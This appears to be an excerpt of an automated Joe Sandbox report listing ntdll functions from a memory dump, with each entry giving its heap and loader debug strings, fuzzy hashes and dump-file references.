                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  • Opcode ID: c8a5ba973d1294fa61227ec02e0110a8fa29b648a238ba9e660b15c30a0684fe
                                                  • Instruction ID: 945c216e0d22a5291edea487000dadaa93fdfc6abede84cbc0b016d9756abc38
                                                  • Opcode Fuzzy Hash: c8a5ba973d1294fa61227ec02e0110a8fa29b648a238ba9e660b15c30a0684fe
                                                  • Instruction Fuzzy Hash: 67E19D74A087419FE721CF29D880B1AB7E0BF84358F200A5DE5A58B2E1DB75D945CB93
                                                  Function 36D751EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Kernel-MUI-Language-Disallowed, xrefs: 36D75352
                                                  • WindowsExcludedProcs, xrefs: 36D7522A
                                                  • Kernel-MUI-Language-SKU, xrefs: 36D7542B
                                                  • Kernel-MUI-Language-Allowed, xrefs: 36D7527B
                                                  • Kernel-MUI-Number-Allowed, xrefs: 36D75247
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                  • API String ID: 0-258546922
                                                  • Opcode ID: 4179aba914b2ab6a6c373e303492c7c462189f185bac0818da69de094ca37739
                                                  • Instruction ID: 1e2152da1a3e6401e1dee542bd49d4bd174e5efbd64b8ac1b55b2b27771c6da6
                                                  • Opcode Fuzzy Hash: 4179aba914b2ab6a6c373e303492c7c462189f185bac0818da69de094ca37739
                                                  • Instruction Fuzzy Hash: F2F13BB6D10229EFDB01CFA5C980ADEBBF9FF48654F51416AE501E7210DB749E01CBA2
                                                  Function 36E2B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 3f262142d94e00b7dd0e1a1e4e33883ac2085bbf9402c0ab2c22a49f62de04de
                                                  • Instruction ID: 872b3bdd0ddefdced099c055ac3f2b2dc5ba0bc1c4ea30dedee552723aabc495
                                                  • Opcode Fuzzy Hash: 3f262142d94e00b7dd0e1a1e4e33883ac2085bbf9402c0ab2c22a49f62de04de
                                                  • Instruction Fuzzy Hash: 73F12973E006118FDB08DF69C99067EBBF7EF88208B19416DD456EB380E674E945CB90
                                                  Function 36D476B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                  • API String ID: 0-3061284088
                                                  • Opcode ID: c5eacdd5227dfbca6816bb8bd5880d50cd8e9b6432d1ce403eff341472fbcc9b
                                                  • Instruction ID: 42f8514a01dd7a483aa129359c4513a173d667ad70f558c291b64a7b9709c0ba
                                                  • Opcode Fuzzy Hash: c5eacdd5227dfbca6816bb8bd5880d50cd8e9b6432d1ce403eff341472fbcc9b
                                                  • Instruction Fuzzy Hash: D0014C36419390FEE226A375D80DF527BF4DB53774F244049F00047990CE69DC8AC575
                                                  Function 36D670C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: c15ac5ba30e42de57da998b8134cc520e8c9e6eed7c7a8fc3fadb5968c225941
                                                  • Instruction ID: 0a1a59facc7aa21e71921911c206219a2197127926af3617022d21fb9fda08e4
                                                  • Opcode Fuzzy Hash: c15ac5ba30e42de57da998b8134cc520e8c9e6eed7c7a8fc3fadb5968c225941
                                                  • Instruction Fuzzy Hash: 73139F74E00359CFEB15CF6AC8947A9BBF1BF48308F948199D895AB381D734A945CFA0
                                                  Function 36D5BEC0 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$.mui$.mun$SystemResources\
                                                  • API String ID: 0-3047833772
                                                  • Opcode ID: f444e9bb1f0fbbdd9b5df660a880b9d182d403eb87d5d9adaab291ff4d601e2f
                                                  • Instruction ID: 8303be20e0742b3627e0511ecc974e2d13b2188ae5af047a74e4058f85b82447
                                                  • Opcode Fuzzy Hash: f444e9bb1f0fbbdd9b5df660a880b9d182d403eb87d5d9adaab291ff4d601e2f
                                                  • Instruction Fuzzy Hash: 08623A76A003299FDF20CF55CC40BD9B7B8BB0A354F4641EAE509A7A50DB719E84CF92
                                                  Function 36D4F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                  • API String ID: 0-2586055223
                                                  • Opcode ID: 680e0e0c8c9a9baee2dbcf850d29baa58efde2f200cb0dabb2edd11feb3fde0e
                                                  • Instruction ID: fb5641c80cf796cc649bab8de5e5682651258da479063cc7c6d5dd571e5fa5a6
                                                  • Opcode Fuzzy Hash: 680e0e0c8c9a9baee2dbcf850d29baa58efde2f200cb0dabb2edd11feb3fde0e
                                                  • Instruction Fuzzy Hash: 6A613476A08780AFE312DB25DC44F6777E8EF84754F140468F9948B2A1DB74DC05CBA2
                                                  Function 36E011A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                  • API String ID: 0-336120773
                                                  • Opcode ID: 7e566343f9125691143fb47a95a281b365b5859b9d94fd3da5a2e677152288e0
                                                  • Instruction ID: 0ef2e612229ad53b7361152d4bc23b8c9b489b2d2584da17ba6ba22949b4b6b1
                                                  • Opcode Fuzzy Hash: 7e566343f9125691143fb47a95a281b365b5859b9d94fd3da5a2e677152288e0
                                                  • Instruction Fuzzy Hash: DB31DC79500210FFE711DBEACC80F96BBE8EF06A68F504055E500DF290EA31EC48EEA5
                                                  Function 36D49148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                  • API String ID: 0-1391187441
                                                  • Opcode ID: c4d57b5bf7285b1e435a4337da8419f52278db7564abd57f036e6bc9d978bb49
                                                  • Instruction ID: 475d30187b2cc639853eda685d5593fe1fc4f8b39cd3aff4c14216b211a0b81e
                                                  • Opcode Fuzzy Hash: c4d57b5bf7285b1e435a4337da8419f52278db7564abd57f036e6bc9d978bb49
                                                  • Instruction Fuzzy Hash: F1313476A10214FFDB02DB96CC84F9ABBF9EF45764F104091E811AB290DB70ED41CE61
                                                  Function 36D57152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: d21b16ebfdad8c6014b740081d479555b7f9bbb6dd4d247be822b542928c4d29
                                                  • Instruction ID: 3913e574e8eeda8a161a110d4c078987552961e4820c6957b511d6fe21b255c7
                                                  • Opcode Fuzzy Hash: d21b16ebfdad8c6014b740081d479555b7f9bbb6dd4d247be822b542928c4d29
                                                  • Instruction Fuzzy Hash: B151FD35E10615EFFF05CB64CC58BADBBB5BF04359F214029E642A3A90EBB09905CBD1
                                                  Function 36E23E10 Relevance: 4.6, APIs: 3, Instructions: 148timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 05760226a999f40e63246e804f8b3839ff1d788051ccfbad96c9955bc28aed74
                                                  • Instruction ID: fce5f46c37fa5b96a64a443eb0c78b4b9e8215dcc6ad5505377fb8ea7b64dfa7
                                                  • Opcode Fuzzy Hash: 05760226a999f40e63246e804f8b3839ff1d788051ccfbad96c9955bc28aed74
                                                  • Instruction Fuzzy Hash: C8518A75A00616AFEB06DF64CC80B9ABBB6FF48314F144065E915A7790CB30AD19CF90
                                                  Function 36D61F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: a851ed976bbbc40dc6c4ab304e540c2a43c1c6789afe768e809199ad53512216
                                                  • Instruction ID: 07eea8afcea6e239b33536421000407620842ca8b4afacd1ebc016a2222f4395
                                                  • Opcode Fuzzy Hash: a851ed976bbbc40dc6c4ab304e540c2a43c1c6789afe768e809199ad53512216
                                                  • Instruction Fuzzy Hash: 0122F3B4A00341EFEF01CF26C890B6ABBF5FF45708F548499E4868B285DB35D886CB61
                                                  Function 36D51460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36D51728
                                                  • HEAP[%wZ]: , xrefs: 36D51712
                                                  • HEAP: , xrefs: 36D51596
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: 32ce42f7cf4cc1ef1fbc289125ef016e71a3371fe75eb7528c85a6860947e4cd
                                                  • Instruction ID: 8e97df2930fa06b4c0cc47b7a1c7a1f31ea6040add04cd8859a64a199d9a53fd
                                                  • Opcode Fuzzy Hash: 32ce42f7cf4cc1ef1fbc289125ef016e71a3371fe75eb7528c85a6860947e4cd
                                                  • Instruction Fuzzy Hash: 18E1FE74A04351DFEB15CF28C890B7ABBF1AF48308F158999E6D68B681DB34E945CB90
                                                  Function 36D5B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                  • API String ID: 0-1145731471
                                                  • Opcode ID: 362a0a26a13598563145b329abc47a397b1619d8b55e1cb9bc12afd0c4a2e1fc
                                                  • Instruction ID: c059e4a91d056dc954e65da5368cc00467d3854c70de5c95ce42d9c4b0deb920
                                                  • Opcode Fuzzy Hash: 362a0a26a13598563145b329abc47a397b1619d8b55e1cb9bc12afd0c4a2e1fc
                                                  • Instruction Fuzzy Hash: C5B10C79E047549FEF14CF6AC890B9DB7B2BF44344F224429E952EBA84D770E840CB62
                                                  Function 36DD368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                  • API String ID: 0-2391371766
                                                  • Opcode ID: 2ed90b4b2520b23cd2dbe7b4fbeb5bab2f07706423ceede7bd30ea69f23abd6e
                                                  • Instruction ID: 46455f35d2b02403a60d1f37346d031477f7797cafba7ab1ca22cac75d76823b
                                                  • Opcode Fuzzy Hash: 2ed90b4b2520b23cd2dbe7b4fbeb5bab2f07706423ceede7bd30ea69f23abd6e
                                                  • Instruction Fuzzy Hash: 6FB1C1B1A05341AFE711EF65CC80F5BB7E8EF46754F520829FA50AB640D771E809CBA2
                                                  Function 36DE36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                  • API String ID: 0-318774311
                                                  • Opcode ID: 382c1f930473792edab796f77bf443617fbb09dcb5faa5562d80df100cb1c357
                                                  • Instruction ID: e00f96431b00e25f5d6ac18489ae47aa78327e0e08a5df737d5aee975aede7e9
                                                  • Opcode Fuzzy Hash: 382c1f930473792edab796f77bf443617fbb09dcb5faa5562d80df100cb1c357
                                                  • Instruction Fuzzy Hash: 70817EB5A08350AFE311DB15CC80B6AB7E8EF85794F421929F980DB790DB74D904CBA2
                                                  Function 36DD7410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                  • API String ID: 0-3870751728
                                                  • Opcode ID: 8dbd98fe0618dddce5edf34f0eb8c00c703d5bec0439c828cd1284b49157e259
                                                  • Instruction ID: 19d1ce00df3f0703e86dfeb8905dd603345cf0cc4d9f270386ca2120995aec35
                                                  • Opcode Fuzzy Hash: 8dbd98fe0618dddce5edf34f0eb8c00c703d5bec0439c828cd1284b49157e259
                                                  • Instruction Fuzzy Hash: 00916EB4E002159FEB54DF69C884B9DBBF1FF48304F2481AAD904AB351E7759841CFA1
                                                  Function 36D5B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                  • API String ID: 0-373624363
                                                  • Opcode ID: 9334dbb0bc3f041c01d16ec60f4b0c1d33ad930012ef175b0714614f35bf48a8
                                                  • Instruction ID: c7f84225600c7d66c4501c11bac08821916dc1b544fc1cda3593a1f6425ca348
                                                  • Opcode Fuzzy Hash: 9334dbb0bc3f041c01d16ec60f4b0c1d33ad930012ef175b0714614f35bf48a8
                                                  • Instruction Fuzzy Hash: BB91EFB5E00319CFEF11CF55C860BAE77B0FF05368F224195E951ABA90D7B89A80CB91
                                                  Function 36D8909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %$&$@
                                                  • API String ID: 0-1537733988
                                                  • Opcode ID: d1c1e085b699dbbd577bf9140ac2f569e0b8d041bfd1dd5e1dca1898e8978e92
                                                  • Instruction ID: 589d13a5e055d4be3b653784f1687c36bbf3aa4d0dc0129512a369426de13d62
                                                  • Opcode Fuzzy Hash: d1c1e085b699dbbd577bf9140ac2f569e0b8d041bfd1dd5e1dca1898e8978e92
                                                  • Instruction Fuzzy Hash: DB71B0749183059FE710CF29C988B0BBBE9BF85758F604A1DF4DA4B690D730D905CB92
                                                  Function 36E2B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 36E2B82A
                                                  • TargetNtPath, xrefs: 36E2B82F
                                                  • GlobalizationUserSettings, xrefs: 36E2B834
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                  • API String ID: 0-505981995
                                                  • Opcode ID: b47d20f549fab68ab9451b821e74e6e8de501fab2602cc61f65fc9f0df0ebe52
                                                  • Instruction ID: 92eca205b67a2942ff412044681fa15aac184baddb2b948eec9fb8e23a2aef6b
                                                  • Opcode Fuzzy Hash: b47d20f549fab68ab9451b821e74e6e8de501fab2602cc61f65fc9f0df0ebe52
                                                  • Instruction Fuzzy Hash: 80617172D01229AFDB21EF55DC88BD9B7B9AF14758F4101E5E509AB250CB34DE88CF90
                                                  Function 36D4F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 36DAE6C6
                                                  • HEAP[%wZ]: , xrefs: 36DAE6A6
                                                  • HEAP: , xrefs: 36DAE6B3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                  • API String ID: 0-1340214556
                                                  • Opcode ID: 8b1d0d3556aba2c52bf527fb7cff1d83cee11aff0d369a25eb92e94a840e118a
                                                  • Instruction ID: c67e5e0bea125444f2c40198aa813b5a8074123b1f29956751a51b1c16b6a696
                                                  • Opcode Fuzzy Hash: 8b1d0d3556aba2c52bf527fb7cff1d83cee11aff0d369a25eb92e94a840e118a
                                                  • Instruction Fuzzy Hash: 7651F5B5A04744EFE312DBA5C994FA6BBF8EF45344F0444A4E6808F692DB34ED40DB61
                                                  Function 36D715F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • LdrpCompleteMapModule, xrefs: 36DBA590
                                                  • minkernel\ntdll\ldrmap.c, xrefs: 36DBA59A
